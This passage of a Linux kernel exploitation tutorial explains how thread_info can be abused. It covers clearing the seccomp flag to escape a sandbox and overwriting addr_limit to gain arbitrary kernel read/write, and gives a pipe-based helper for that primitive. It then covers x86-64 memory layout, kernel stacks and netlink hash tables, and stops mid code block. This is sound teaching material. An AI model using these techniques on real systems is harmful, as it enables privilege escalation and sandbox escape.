Introduction



In this final part, we will transform the arbitrary call primitive (cf. part 3) into arbitrary code execution in ring-0, repair the kernel and get root credentials. It leans heavily on x86-64 architecture-specific details.

First, the core concept section focuses on another critical kernel structure (thread_info) and how it can be abused from an exploitation point of view (retrieve current, escape a seccomp-based sandbox, gain arbitrary read/write). Next, we will see the virtual memory layout, the kernel thread stacks and how they are linked to the thread_info. Then we will see how Linux implements the hash tables used by Netlink. This will help for kernel repair.

Secondly, we will try to call a userland payload directly and see how we get blocked by a hardware protection mechanism (SMEP). We will do an extensive study of a page fault exception trace to get meaningful information and see various ways to defeat SMEP.

Thirdly, we will extract gadgets from a kernel image and explain why we need to restrict the search to the .text section. With such gadgets, we will do a stack pivot and see how to deal with aliasing. With relaxed constraints on gadgets, we will implement the ROP-chain that disables SMEP, restores the stack pointer and stack frame, and jumps to userland code in a clean state.

Fourth, we will repair the kernel. While repairing the socket dangling pointer is pretty straightforward, repairing the netlink hash list is a bit more complex. Since the bucket lists are not circular and we lost track of some elements during the reallocation, we will use a trick and an information leak to repair them.

Finally, we will do a short study of the exploit reliability (where it can fail) and build a danger map covering the various stages of the exploit. Then, we will see how to gain root rights.

Core Concepts #4

WARNING: A lot of the concepts addressed here are out-dated because of a major overhaul that started in mid-2016. For instance, some of thread_info's fields have been moved into the thread_struct (i.e. embedded in task_struct). Still, understanding "what it was" can help you understand "what it is" right now. And again, a lot of systems run "old" kernel versions (i.e. < 4.8.x).

First, we have a look at the critical thread_info structure and how it can be abused during an exploitation scenario (retrieving current, escaping seccomp, arbitrary read/write).

Next, we will see how the virtual memory map is organized in an x86-64 environment. In particular, we will see why address translation is limited to 48 bits (instead of 64) as well as what a "canonical" address means.

Then, we will focus on the kernel thread stacks, explaining where and when they are created as well as what they hold.

Finally, we will focus on the netlink hash table data structure and the associated algorithm. Understanding them will help during kernel repair and improve the exploit reliability.

The thread_info Structure

Just like struct task_struct, struct thread_info is a very important structure that one must understand in order to exploit bugs in the Linux kernel.

This structure is architecture dependent. In the x86-64 case, the definition is:

// [arch/x86/include/asm/thread_info.h]

struct thread_info {

struct task_struct *task;

struct exec_domain *exec_domain;

__u32 flags;

__u32 status;

__u32 cpu;

int preempt_count;

mm_segment_t addr_limit;

struct restart_block restart_block;

void __user *sysenter_return;

#ifdef CONFIG_X86_32

unsigned long previous_esp;

__u8 supervisor_stack[0];

#endif

int uaccess_err;

};

The most important fields are:



- task: pointer to the task_struct linked to this thread_info (cf. next section)

- flags: holds flags such as _TIF_NEED_RESCHED or _TIF_SECCOMP (cf. Escaping Seccomp-Based Sandbox)

- addr_limit: the "highest" userland virtual address from kernel point-of-view. Used in "software protection mechanism" (cf. Gaining Arbitrary Read/Write)

Let's see how we can abuse each of those fields in an exploitation scenario.

Using Kernel Thread Stack Pointer

In general, if you've got access to a task_struct pointer, you can retrieve lots of other kernel structures by dereferencing pointers from it. For instance, we will use it in our case to find the address of the file descriptor table during kernel repair.

Since the task field points to the associated task_struct, retrieving current (remember Core Concept #1?) is as simple as:

#define get_current() (current_thread_info()->task)

The problem is: how to get the address of the current thread_info?

Suppose that you have a pointer into the kernel "thread stack". You can then retrieve the current thread_info pointer with:

#define THREAD_SIZE (PAGE_SIZE << 2)

#define current_thread_info(ptr) ((struct thread_info *)((unsigned long)(ptr) & ~(THREAD_SIZE - 1)))

struct thread_info *ti = current_thread_info(leaky_stack_ptr);

The reason why this works is because the thread_info lives inside the kernel thread stack (see the "Kernel Stacks" section).
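To make the masking concrete, here is a minimal userland sketch of the same arithmetic. It assumes 4096-byte pages and the 16 KB thread stacks described in this article. The function name and the sample addresses are made up for illustration, they do not come from a real leak.

```c
#include <stdint.h>

#define PAGE_SIZE   4096UL
#define THREAD_SIZE (PAGE_SIZE << 2)   /* 16 KB, as in the macro above */

/* Round a (hypothetical) leaked kernel stack address down to the
 * THREAD_SIZE-aligned base of the stack region, which is where
 * thread_info lives on the kernels discussed here. */
uint64_t thread_info_from_stack_ptr(uint64_t leaked_stack_ptr)
{
    return leaked_stack_ptr & ~(uint64_t)(THREAD_SIZE - 1);
}
```

Any address inside the same 16 KB region yields the same base, so it does not matter how deep in the call stack the leaked pointer was taken.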

On the other hand, if you have a pointer to a task_struct, you can retrieve the current thread_info with the stack field in task_struct.

That is, if you have one of those pointers, you can retrieve each of the other structures:

Note that the task_struct's stack field doesn't point to the top of the (kernel thread) stack but to the thread_info!

Escaping Seccomp-Based Sandbox

Containers as well as sandboxed applications seem to be more and more widespread nowadays. Using a kernel exploit is sometimes the only way (or the easiest one) to actually escape them.

The Linux kernel's seccomp is a facility which allows programs to restrict access to syscalls. A syscall can be either fully forbidden (invoking it is impossible) or partially forbidden (parameters are filtered). It is set up using BPF rules (a "program" compiled in the kernel) called seccomp filters.

Once enabled, seccomp filters cannot be disabled by "normal" means. The API enforces it as there is no syscall for it.

When a program using seccomp makes a system call, the kernel checks whether the thread_info's flags field has one of the _TIF_WORK_SYSCALL_ENTRY flags set (TIF_SECCOMP is one of them). If so, it follows the syscall_trace_enter() path. At the very beginning, the function secure_computing() is called:

long syscall_trace_enter(struct pt_regs *regs)

{

long ret = 0;

if (test_thread_flag(TIF_SINGLESTEP))

regs->flags |= X86_EFLAGS_TF;

/* do the secure computing check first */

secure_computing(regs->orig_ax); // <----- "rax" holds the syscall number

// ...

}

static inline void secure_computing(int this_syscall)

{

if (unlikely(test_thread_flag(TIF_SECCOMP))) // <----- check the flag again

__secure_computing(this_syscall);

}

We will not explain what is going on with seccomp past this point. Long story short, if the syscall is forbidden, a SIGKILL signal will be delivered to the offending process.

The important thing is: clearing the TIF_SECCOMP flag of the current running thread (i.e. thread_info) is "enough" to disable seccomp checks.

WARNING: This is only true for the "current" thread, forking/execve'ing from here will "re-enable" seccomp (see task_struct).
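The flag manipulation itself is a one-liner. The sketch below models it in userland with a stand-in structure (fake_thread_info is hypothetical and only holds the field we care about). The bit position 8 for TIF_SECCOMP is an assumption for the x86 kernels of that era, so check arch/x86/include/asm/thread_info.h of your target before relying on it.

```c
#include <stdint.h>

/* Assumed bit position of TIF_SECCOMP on the targeted x86 kernels. */
#define TIF_SECCOMP       8
#define TIF_SECCOMP_MASK  (1U << TIF_SECCOMP)

/* Hypothetical stand-in for struct thread_info (flags field only). */
struct fake_thread_info {
    uint32_t flags;
};

/* What the kernel-side payload would do on the current thread_info. */
void clear_seccomp_flag(struct fake_thread_info *ti)
{
    ti->flags &= ~TIF_SECCOMP_MASK;
}

/* Models the test_thread_flag(TIF_SECCOMP) check seen above. */
int seccomp_check_would_run(const struct fake_thread_info *ti)
{
    return (ti->flags & TIF_SECCOMP_MASK) != 0;
}
```

Note that only the seccomp bit is touched: the other flags (e.g. a pending reschedule) must be left intact.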

Gaining Arbitrary Read/Write

Now let's check the addr_limit field of thread_info.

If you look at various system call implementations, you will see that most of them call copy_from_user() at the very beginning to copy userland data into kernel-land. Failing to do so can lead to time-of-check time-of-use (TOCTOU) bugs (e.g. changing a userland value after it has been checked).

In the very same way, system call code must call copy_to_user() to copy a result from kernel-land into userland data.

long copy_from_user(void *to, const void __user * from, unsigned long n);

long copy_to_user(void __user *to, const void *from, unsigned long n);

NOTE: The __user macro does nothing, this is just a hint for kernel developers that this data is a pointer to userland memory. In addition, some tools like sparse can benefit from it.

Both copy_from_user() and copy_to_user() are architecture dependent functions. On x86-64 architecture, they are implemented in arch/x86/lib/copy_user_64.S.

NOTE: If you don't like reading assembly code, there is a generic implementation that can be found in include/asm-generic/*. It can help you figure out what an architecture-dependent function is "supposed to do".

The generic (i.e. not x86-64) code for copy_from_user() looks like this:

// from [include/asm-generic/uaccess.h]

static inline long copy_from_user(void *to,

const void __user * from, unsigned long n)

{

might_sleep();

if (access_ok(VERIFY_READ, from, n))

return __copy_from_user(to, from, n);

else

return n;

}

The "software" access rights checks are performed in access_ok() while __copy_from_user() unconditionally copies n bytes from from to to. In other words, if you see a __copy_from_user() where parameters haven't been checked, there is a serious security vulnerability. Let's get back to the x86-64 architecture.

Prior to executing the actual copy, the parameter marked with __user is checked against the addr_limit value of the current thread_info. If the range (from+n) is below addr_limit, the copy is performed, otherwise copy_from_user() returns a non-zero value (the number of bytes that could not be copied) indicating an error.

The addr_limit value is set and retrieved using the set_fs() and get_fs() macros respectively:

#define get_fs() (current_thread_info()->addr_limit)

#define set_fs(x) (current_thread_info()->addr_limit = (x))

For instance, when you do an execve() syscall, the kernel tries to find a proper "binary loader". Assuming the binary is an ELF, the load_elf_binary() function is invoked and it ends by calling the start_thread() function:

// from [arch/x86/kernel/process_64.c]

void start_thread(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp)

{

loadsegment(fs, 0);

loadsegment(es, 0);

loadsegment(ds, 0);

load_gs_index(0);

regs->ip = new_ip;

regs->sp = new_sp;

percpu_write(old_rsp, new_sp);

regs->cs = __USER_CS;

regs->ss = __USER_DS;

regs->flags = 0x200;

set_fs(USER_DS); // <-----

/*

* Free the old FP and other extended state

*/

free_thread_xstate(current);

}

The start_thread() function resets the current thread_info's addr_limit value to USER_DS which is defined here:

#define MAKE_MM_SEG(s) ((mm_segment_t) { (s) })

#define TASK_SIZE_MAX ((1UL << 47) - PAGE_SIZE)

#define USER_DS MAKE_MM_SEG(TASK_SIZE_MAX)

That is, a userland address is valid if it is below 0x7ffffffff000 (used to be 0xc0000000 on 32-bit).

As you might have already guessed, overwriting the addr_limit value leads to an arbitrary read/write primitive. Ideally, we want something that does:

#define KERNEL_DS MAKE_MM_SEG(-1UL) // <----- 0xffffffffffffffff

set_fs(KERNEL_DS);

If we manage to do this, we disable a software protection mechanism. Again, this is "software" only! The hardware protections are still on: accessing kernel memory directly from userland will provoke a page fault that will kill your exploit (SIGSEGV) because the running level is still CPL=3 (see the "page fault" section).
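To see why changing addr_limit matters, here is a simplified userland model of the range check. It is only a sketch: the real x86-64 check is done in assembly and range_ok() is a made-up name. The two limits mirror USER_DS and KERNEL_DS as defined above, assuming 4096-byte pages.

```c
#include <stdint.h>

#define PAGE_SIZE        4096UL
#define USER_DS_LIMIT    ((1ULL << 47) - PAGE_SIZE)  /* TASK_SIZE_MAX */
#define KERNEL_DS_LIMIT  UINT64_MAX                  /* -1UL */

/* Returns 1 when [addr, addr + size) is acceptable under `limit`,
 * 0 otherwise. A wrap-around of addr + size is always rejected. */
int range_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    uint64_t end = addr + size;

    if (end < addr)   /* the addition overflowed */
        return 0;
    return end <= limit;
}
```

With USER_DS_LIMIT a kernel address such as 0xffff880000000000 is refused, whereas with KERNEL_DS_LIMIT the very same address passes the check.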

Since we want to read/write kernel memory from userland, we can actually ask the kernel to do it for us through a syscall that calls copy_{to|from}_user() while providing a kernel pointer in a "__user" marked parameter.
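One possible way to do this (our choice for illustration, other syscalls would work too) is to bounce the data through a pipe: write() makes the kernel read from the source pointer and read() makes it write to the destination pointer. The helper name copy_via_pipe() is made up. On an unmodified system, passing a kernel address simply fails with EFAULT, it only becomes a read/write primitive once addr_limit has been overwritten.

```c
#include <stddef.h>
#include <unistd.h>

/* Copy `len` bytes from `src` to `dst` by bouncing them through a pipe.
 * write() makes the kernel read from `src` and read() makes it write
 * into `dst`, so both pointers go through the "__user" checks.
 * Returns 0 on success, -1 on failure.
 * Keep `len` small (below the pipe capacity) to avoid blocking. */
int copy_via_pipe(void *dst, const void *src, size_t len)
{
    int fds[2];
    int ret = -1;

    if (pipe(fds) < 0)
        return -1;

    if (write(fds[1], src, len) == (ssize_t)len &&
        read(fds[0], dst, len) == (ssize_t)len)
        ret = 0;

    close(fds[0]);
    close(fds[1]);
    return ret;
}
```

An arbitrary read would then be copy_via_pipe(user_buf, kernel_addr, len) and an arbitrary write copy_via_pipe(kernel_addr, user_buf, len).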

Final note about thread_info

As you might have noticed from the three examples shown here, the thread_info structure is of utmost importance in general as well as for exploitation scenarios. We showed that:

- By leaking a kernel thread stack pointer, we can retrieve a pointer to the current task_struct (hence lots of kernel data structures)

- By overwriting the flags field we can disable seccomp protection and eventually escape some sandboxes

- We can gain an arbitrary read/write primitive by changing the value of the addr_limit field

Those are just a sample of things you can do with thread_info. This is a small but critical structure.



Virtual Memory Map

In the previous section, we saw that the "highest" valid userland address was:

#define TASK_SIZE_MAX ((1UL << 47) - PAGE_SIZE) // == 0x00007ffffffff000

One might wonder where this "47" comes from.

When the AMD64 architecture was designed, a full 2^64 address space was considered "too big": translating all 64 bits would have required additional page table levels (a performance hit). For this reason, it was decided that only the lowest 48 bits of an address are used to translate a virtual address into a physical address.

However, if the userland address space ranges from 0x0000000000000000 to 0x00007ffffffff000, what will the kernel address space be? The answer is: 0xffff800000000000 to 0xffffffffffffffff.

That is, the bits [48:63] are:

- all cleared for user addresses

- all set for kernel addresses

More specifically, AMD imposed that bits [48:63] must be copies of bit 47. Otherwise, an exception is thrown. Addresses respecting this convention are called canonical form addresses. With such a model, it is still possible to address 256TB of memory (half for user, half for kernel).

The space between 0x00007ffffffff000 and 0xffff800000000000 is made of unused memory addresses (also called "non-canonical addresses"). That is, the virtual memory layout for a 64-bit process is:

The above diagram is the "big picture". You can get a more precise virtual memory map in the Linux kernel documentation: Documentation/x86/x86_64/mm.txt.

NOTE: The "guard hole" address range is needed by some hypervisors (e.g. Xen).

In the end, when you see an address starting with "0xffff8*" or higher, you can be sure that it is a kernel one.
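The canonical form rule is easy to check programmatically. The following sketch (helper names are ours) tests whether bits [48:63] are copies of bit 47 and whether an address belongs to the kernel half. It can be handy when sanity-checking leaked pointers in an exploit.

```c
#include <stdint.h>

/* An address is canonical when bits [48:63] all equal bit 47.
 * Shifting right by 47 keeps bits 47..63 (17 bits), which must
 * therefore be all zeroes or all ones. */
int is_canonical(uint64_t addr)
{
    uint64_t upper = addr >> 47;

    return upper == 0 || upper == 0x1ffff;
}

/* Kernel half: canonical with bit 47 (and above) set. */
int is_kernel_address(uint64_t addr)
{
    return (addr >> 47) == 0x1ffff;
}
```

For instance, 0xffffffff8155372b (taken from a call trace) is a kernel address while 0x0000800000000000 is non-canonical.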

Kernel Thread Stacks

In Linux (x86-64 architecture), there are two kinds of kernel stacks:

- thread stacks: 16k-bytes stacks for every active thread

- specialized stacks: a set of per-cpu stacks used in special operations

You may want to read the Linux kernel documentation for additional/complementary information: Documentation/x86/x86_64/kernel-stacks.

First, let's describe the thread stacks. When a new thread is created (i.e. a new task_struct), the kernel does a "fork-like" operation by calling copy_process(). The latter allocates a new task_struct (remember, there is one task_struct per thread) and copies most of the parent's task_struct into the new one.

However, depending on how the task is created, some resources can be either shared (e.g. memory is shared in a multithreaded application) or "copied" (e.g. the libc's data). In the latter case, if the thread modifies some data, a new separate version is created: this is called copy-on-write (i.e. it impacts only the current thread and not every thread importing the libc).

In other words, a process is never created "from scratch" but starts by being a copy of its parent process (be it init). The "differences" are fixed later on.

Furthermore, there is some thread specific data, one of them being the kernel thread stack. During the creation/duplication process, dup_task_struct() is called very early:

static struct task_struct *dup_task_struct(struct task_struct *orig)

{

struct task_struct *tsk;

struct thread_info *ti;

unsigned long *stackend;

int node = tsk_fork_get_node(orig);

int err;

prepare_to_copy(orig);

[0] tsk = alloc_task_struct_node(node);

if (!tsk)

return NULL;

[1] ti = alloc_thread_info_node(tsk, node);

if (!ti) {

free_task_struct(tsk);

return NULL;

}

[2] err = arch_dup_task_struct(tsk, orig);

if (err)

goto out;

[3] tsk->stack = ti;

// ... cut ...

[4] setup_thread_stack(tsk, orig);

// ... cut ...

}

#define THREAD_ORDER 2

#define alloc_thread_info_node(tsk, node) \

({ \

struct page *page = alloc_pages_node(node, THREAD_FLAGS, \

THREAD_ORDER); \

struct thread_info *ret = page ? page_address(page) : NULL; \

\

ret; \

})

The previous code does the following:

- [0]: allocates a new struct task_struct using the Slab allocator

- [1]: allocates a new thread stack using the Buddy allocator

- [2]: copies the orig task_struct content to the new tsk task_struct (differences will be fixed later on)

- [3]: changes the task_struct's stack pointer to ti. The new thread now has its own dedicated thread stack and its own thread_info

- [4]: copies the content of orig's thread_info to the new tsk's thread_info and fixes the task field.



One might be confused by [1]. The macro alloc_thread_info_node() is supposed to allocate a struct thread_info and yet, it allocates a thread stack. The reason is that thread_info structures live in thread stacks:

#define THREAD_SIZE (PAGE_SIZE << THREAD_ORDER)

union thread_union { // <----- this is an "union"

struct thread_info thread_info;

unsigned long stack[THREAD_SIZE/sizeof(long)]; // <----- 16k-bytes

};

Except for the init process, thread_union is not used anymore (on x86-64) but the layout is still the same:

NOTE: The KERNEL_STACK_OFFSET exists for "optimization reasons" (avoid a sub operation in some cases). You can ignore it for now.

The STACK_END_MAGIC is here to mitigate kernel thread stack overflow exploitation. As explained earlier, overwriting thread_info data can lead to nasty things (it also holds function pointers in the restart_block field).

Since thread_info sits at the lowest address of this region (the stack grows down towards it), you hopefully understand now why, by masking out the low bits (THREAD_SIZE - 1), you can retrieve the thread_info address from any kernel thread stack pointer.

In the previous diagram, one might notice the kernel_stack pointer. This is a "per-cpu" variable (i.e. one for each cpu) declared here:

// [arch/x86/kernel/cpu/common.c]

DEFINE_PER_CPU(unsigned long, kernel_stack) =

(unsigned long)&init_thread_union - KERNEL_STACK_OFFSET + THREAD_SIZE;

Initially, kernel_stack points to the init thread stack (i.e. init_thread_union). However, during a context switch, this (per-cpu) variable is updated:

#define task_stack_page(task) ((task)->stack)

__switch_to(struct task_struct *prev_p, struct task_struct *next_p)

{

// ... cut ..

percpu_write(kernel_stack,

(unsigned long)task_stack_page(next_p) +

THREAD_SIZE - KERNEL_STACK_OFFSET);

// ... cut ..

}

In the end, the current thread_info is retrieved with:

static inline struct thread_info *current_thread_info(void)

{

struct thread_info *ti;

ti = (void *)(percpu_read_stable(kernel_stack) +

KERNEL_STACK_OFFSET - THREAD_SIZE);

return ti;

}

The kernel_stack pointer is used while entering a system call. It replaces the current (userland) rsp which is restored while exiting system call.
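The two computations above (in __switch_to() and current_thread_info()) are the inverse of each other. Here is a small userland sketch of that round trip. It assumes 4096-byte pages and a KERNEL_STACK_OFFSET of 5*8 bytes, which is what we believe the targeted x86-64 kernels use (verify it in your kernel tree). The function names and the sample address are made up.

```c
#include <stdint.h>

#define PAGE_SIZE            4096UL
#define THREAD_ORDER         2
#define THREAD_SIZE          (PAGE_SIZE << THREAD_ORDER)
#define KERNEL_STACK_OFFSET  (5 * 8)   /* assumption, see lead-in */

/* What __switch_to() stores in the per-cpu kernel_stack variable,
 * given the base of the next task's stack region (task->stack). */
uint64_t kernel_stack_for(uint64_t stack_page)
{
    return stack_page + THREAD_SIZE - KERNEL_STACK_OFFSET;
}

/* What current_thread_info() computes back from kernel_stack. */
uint64_t thread_info_from_kernel_stack(uint64_t kernel_stack)
{
    return kernel_stack + KERNEL_STACK_OFFSET - THREAD_SIZE;
}
```

With a stack region based at 0xffff88001b5a0000, kernel_stack would be 0xffff88001b5a3fd8, and converting it back gives the thread_info address again.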





Understanding Netlink Data Structures

Let's have a closer look at netlink data structures. This will help us understand where and what are the dangling pointers we are trying to repair.

Netlink has a "global" array nl_table of type netlink_table:

// [net/netlink/af_netlink.c]

struct netlink_table {

struct nl_pid_hash hash; // <----- we will focus on this

struct hlist_head mc_list;

unsigned long *listeners;

unsigned int nl_nonroot;

unsigned int groups;

struct mutex *cb_mutex;

struct module *module;

int registered;

};

static struct netlink_table *nl_table; // <----- the "global" array

The nl_table array is initialized at boot-time with netlink_proto_init():

// [include/linux/netlink.h]

#define NETLINK_ROUTE 0 /* Routing/device hook */

#define NETLINK_UNUSED 1 /* Unused number */

#define NETLINK_USERSOCK 2 /* Reserved for user mode socket protocols */

// ... cut ...

#define MAX_LINKS 32

// [net/netlink/af_netlink.c]

static int __init netlink_proto_init(void)

{

// ... cut ...

nl_table = kcalloc(MAX_LINKS, sizeof(*nl_table), GFP_KERNEL);

// ... cut ...

}

In other words, there is one netlink_table per protocol (NETLINK_USERSOCK being one of them). Furthermore, each of those netlink tables embeds a hash field of type struct nl_pid_hash:

// [net/netlink/af_netlink.c]

struct nl_pid_hash {

struct hlist_head *table;

unsigned long rehash_time;

unsigned int mask;

unsigned int shift;

unsigned int entries;

unsigned int max_shift;

u32 rnd;

};

This structure is used to manipulate a netlink hash table. To that end, the following fields are used:

- table: an array of struct hlist_head, the actual hash table

- rehash_time: used to limit how often a "dilution" can occur over time

- mask: number of buckets (minus 1), hence used to mask the result of the hash function

- shift: a number of bits (i.e. order) used to compute an "average" number of elements (i.e. the load factor). Incidentally, it represents the number of times the table has grown.

- entries: total number of elements in the hash table

- max_shift: a number of bits (i.e. order). The maximum number of times the table can grow, hence the maximum number of buckets

- rnd: a random number used by the hash function

Before going back to the netlink hash table implementation, let's have an overview of the hash table API in Linux.

Linux Hash Table API





The hash table itself is manipulated with other typical Linux data structures: struct hlist_head and struct hlist_node. Unlike struct list_head (cf. "Core Concept #3") which uses the same type to represent both the list head and the elements, the hash list uses two types defined here:

// [include/linux/list.h]

/*

* Double linked lists with a single pointer list head.

* Mostly useful for hash tables where the two pointer list head is

* too wasteful.

* You lose the ability to access the tail in O(1). // <----- this

*/

struct hlist_head {

struct hlist_node *first;

};

struct hlist_node {

struct hlist_node *next, **pprev; // <----- note the "pprev" type (pointer of pointer)

};

So, the hash table is composed of one or multiple buckets. Each element in a given bucket is in a non-circular doubly linked list. It means:

- the last element in a bucket's list points to NULL

- the first element's pprev pointer in the bucket list points to the hlist_head's first pointer (hence the pointer of pointer).

The bucket itself is represented with a hlist_head which has a single pointer. In other words, we can't access the tail from a bucket's head. We need to walk the whole list (cf. the comment in the code).

In the end, a typical hash table looks like this:

You may want to check this FAQ (from kernelnewbies.org) for a usage example (just like we did with list_head in "Core Concept #3").
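To get a feeling for the pprev "pointer of pointer", here is a minimal userland re-implementation of the two types with a head insertion and an unlink operation. hlist_add_head() follows the logic of the kernel function of the same name. hlist_unlink() is our own name for the bare unlink step (the kernel version additionally poisons the removed node's pointers).

```c
#include <stddef.h>

struct hlist_node { struct hlist_node *next, **pprev; };
struct hlist_head { struct hlist_node *first; };

/* Insert n at the head of bucket h. */
void hlist_add_head(struct hlist_node *n, struct hlist_head *h)
{
    struct hlist_node *first = h->first;

    n->next = first;
    if (first)
        first->pprev = &n->next;   /* old first now hangs off n */
    h->first = n;
    n->pprev = &h->first;          /* first element points back to the head */
}

/* Unlink n from its list. No special case is needed for the first
 * element: *pprev is either the head's first or the previous next. */
void hlist_unlink(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    *pprev = next;
    if (next)
        next->pprev = pprev;
}
```

Notice that unlinking an element requires no pointer to the bucket head, which is precisely what the pprev design buys.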

Netlink Hash Tables Initialization

Let's get back to the netlink's hash tables initialization code which can be split in two parts.

First, an order value is computed based on the totalram_pages global variable. The latter is computed during boot-time and, as the name suggests, (roughly) represents the number of page frames available in RAM. For instance, on a 512MB system, the max_shift will be something like 16 (i.e. 65k buckets per hash table).

Secondly, a distinct hash table is created for every netlink protocol:

static int __init netlink_proto_init(void)

{

// ... cut ...

for (i = 0; i < MAX_LINKS; i++) {

struct nl_pid_hash *hash = &nl_table[i].hash;

[0] hash->table = nl_pid_hash_zalloc(1 * sizeof(*hash->table));

if (!hash->table) {

// ... cut (free everything and panic!) ...

}

hash->max_shift = order;

hash->shift = 0;

[1] hash->mask = 0;

hash->rehash_time = jiffies;

}

// ... cut ...

}

In [0], the hash table is allocated with a single bucket. Hence the mask is set to zero in [1] (number of buckets minus one). Remember, the field hash->table is an array of struct hlist_head, each pointing to a bucket list head.

Basic Netlink Hash Table Insertion

Alright, now that we know the initial state of netlink hash tables (only one bucket), let's study the insertion algorithm which starts in netlink_insert(). In this section, we will only consider the "basic" case (i.e. discard the "dilute" mechanism).

The purpose of netlink_insert() is to insert a sock's hlist_node into a hash table using the provided pid in argument. A pid can only appear once per hash table.

First, let's study the beginning of the netlink_insert() code:

static int netlink_insert(struct sock *sk, struct net *net, u32 pid)

{

[0] struct nl_pid_hash *hash = &nl_table[sk->sk_protocol].hash;

struct hlist_head *head;

int err = -EADDRINUSE;

struct sock *osk;

struct hlist_node *node;

int len;

[1a] netlink_table_grab();

[2] head = nl_pid_hashfn(hash, pid);

len = 0;

[3] sk_for_each(osk, node, head) {

[4] if (net_eq(sock_net(osk), net) && (nlk_sk(osk)->pid == pid))

break;

len++;

}

[5] if (node)

goto err;

// ... cut ...

err:

[1b] netlink_table_ungrab();

return err;

}

The previous code does:

- [0]: retrieve the nl_pid_hash (i.e. hash table) for the given protocol (e.g. NETLINK_USERSOCK)

- [1a]: protect access to all netlink hash tables with a lock

- [2]: retrieve a pointer to a bucket (i.e. a hlist_head) using the pid argument as a key of the hash function

- [3]: walk the bucket's doubly linked-list and...

- [4]: ... check for collision on the pid

- [5]: if the pid was found in the bucket's list (node is not NULL), jump to err. It will return a -EADDRINUSE error.

- [1b]: release the netlink hash tables lock

Except [2], this is pretty straightforward: find the proper bucket and scan it to check that the pid does not already exist.

Next comes a bunch of sanity checks:

err = -EBUSY;

[6] if (nlk_sk(sk)->pid)

goto err;

err = -ENOMEM;

[7] if (BITS_PER_LONG > 32 && unlikely(hash->entries >= UINT_MAX))

goto err;

In [6], the netlink_insert() code makes sure that the sock being inserted in the hash table does not already have a pid set. In other words, it checks that it hasn't already been inserted into the hash table. The check at [7] is simply a hard limit. A Netlink hash table can't have more than 4 billion (2^32) elements (that's still a lot!).





Finally:

[8] if (len && nl_pid_hash_dilute(hash, len))

[9] head = nl_pid_hashfn(hash, pid);

[10] hash->entries++;

[11] nlk_sk(sk)->pid = pid;

[12] sk_add_node(sk, head);

[13] err = 0;

Which does:

- [8]: if the current bucket has at least one element, calls nl_pid_hash_dilute() (cf. next section)

- [9]: if the hash table has been diluted, find the new bucket pointer (hlist_head)

- [10]: increase the total number of elements in the hash table

- [11]: set the sock's pid field

- [12]: add the sock's hlist_node into the doubly-linked bucket's list

- [13]: reset err since netlink_insert() succeeds

Before going further, let's see a couple of things. If we unroll sk_add_node(), we can see that:

- it takes a reference on the sock (i.e. increase the refcounter)

- it calls hlist_add_head(&sk->sk_node, list)

In other words, when a sock is inserted into a hash table, it is always inserted at the head of a bucket. We will use this property later on, keep this in mind.

Finally, let's look at the hash function:

static struct hlist_head *nl_pid_hashfn(struct nl_pid_hash *hash, u32 pid)

{

return &hash->table[jhash_1word(pid, hash->rnd) & hash->mask];

}

As expected, this function just computes an index into the hash->table array, wraps it using the mask field of the hash table and returns the hlist_head pointer representing the bucket.

The hash function itself is jhash_1word(), which is the Linux implementation of the Jenkins hash function. It is not required to understand the implementation but note that it uses two "keys" (pid and hash->rnd) and assume this is not "reversible".

One might have noticed that without the "dilute" mechanism, the hash table actually never extends. Since it is initialized with one bucket, elements are simply stored in a single doubly-linked list... pretty useless utilization of hash tables!
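The role of the mask can be illustrated with a few lines of code. Beware: toy_hash() below is a made-up mixing function used as a stand-in, it is NOT jhash_1word() and will not produce the same values as the kernel. Only the masking logic in bucket_index() reflects nl_pid_hashfn().

```c
#include <stdint.h>

/* Hypothetical stand-in for jhash_1word(pid, rnd). NOT the real one. */
uint32_t toy_hash(uint32_t pid, uint32_t rnd)
{
    uint32_t h = pid ^ rnd;

    h ^= h >> 16;
    h *= 0x45d9f3bU;
    h ^= h >> 16;
    return h;
}

/* Same shape as nl_pid_hashfn(): hash the pid, then wrap with the mask.
 * Returns the bucket index instead of the hlist_head pointer. */
uint32_t bucket_index(uint32_t pid, uint32_t rnd, uint32_t mask)
{
    return toy_hash(pid, rnd) & mask;
}
```

With mask equal to zero (the initial state), every pid lands in bucket 0 whatever the hash value is. With mask equal to 7, the index is always in the range [0, 7].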

The Netlink Hash Table "Dilution" Mechanism

As stated above, by the end of netlink_insert() the code calls nl_pid_hash_dilute() if len is not zero (i.e. the bucket is not empty). If the "dilution" succeeds, it searches a new bucket to add the sock element (the hash table has been "rehashed"):

if (len && nl_pid_hash_dilute(hash, len))

head = nl_pid_hashfn(hash, pid);

Let's check the implementation:

static inline int nl_pid_hash_dilute(struct nl_pid_hash *hash, int len)

{

[0] int avg = hash->entries >> hash->shift;

[1] if (unlikely(avg > 1) && nl_pid_hash_rehash(hash, 1))

return 1;

[2] if (unlikely(len > avg) && time_after(jiffies, hash->rehash_time)) {

nl_pid_hash_rehash(hash, 0);

return 1;

}

[3] return 0;

}

Fundamentally, what this function is trying to do is:

- it makes sure there are "enough" buckets in the hash table to minimize collisions, otherwise it tries to grow the hash table

- it keeps all buckets balanced

As we will see in the next section, when the hash table "grows", the number of buckets is multiplied by two. Because of this, the expression at [0], is equivalent to:

avg = nb_elements / (2^(shift)) <===> avg = nb_elements / nb_buckets

It computes the load factor of the hash table.

The check at [1] is true when the average number of elements per bucket is greater than or equal to 2. In other words, the hash table has "on average" two elements per bucket. If a third element is about to be added, the hash table is expanded and then diluted through "rehashing".

The check at [2] is kinda similar to [1], the difference being that the hash table isn't expanded. Since len is greater than avg which is greater than 1, when trying to add a third element into a bucket, the whole hash table is again diluted and "rehashed". On the other hand, if the table is mostly empty (i.e. avg equals zero), then trying to add into a non-empty bucket (len > 0) provokes a "dilution". Since this operation is costly (O(N)) and can happen at every insertion under certain circumstances (e.g. can't grow anymore), its occurrence is limited with rehash_time.

NOTE: jiffies is a measure of time, see Kernel Timer Systems.

In the end, the way netlink stores elements in its hash tables is a 1:2 mapping on average. The only exception is when the hash table can't grow anymore. In that case, it slowly becomes a 1:3, 1:4 mapping, etc. Reaching this point means that there are more than 128k netlink sockets or so. From the exploiter's point of view, chances are that you will be limited by the number of opened file descriptors before reaching this point.
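The decision taken by nl_pid_hash_dilute() can be modeled as a pure function, which helps to predict when a dilution will happen during an exploit. This is a simplified sketch: the structure and names are ours, the time_after() test is reduced to a boolean, and we assume that growing only fails when max_shift is reached (memory allocation failures are ignored).

```c
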